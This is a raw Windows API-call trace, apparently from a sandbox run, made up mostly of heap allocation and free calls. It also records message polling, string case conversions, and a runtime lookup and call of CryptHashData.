RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0242.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b16f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b16f8 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.741] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.741] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.741] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.742] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0242.742] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0242.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0242.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0242.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x34aa6a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0242.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.746] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0242.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0242.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0242.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0242.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.746] CryptHashData (hHash=0xaa57e0, pbData=0x24b1778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0242.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0242.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0242.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0242.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0242.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0242.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0242.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0242.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0242.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0242.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0242.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0242.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.751] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.752] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0242.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0242.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0242.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0242.757] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.757] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.757] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0242.757] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb 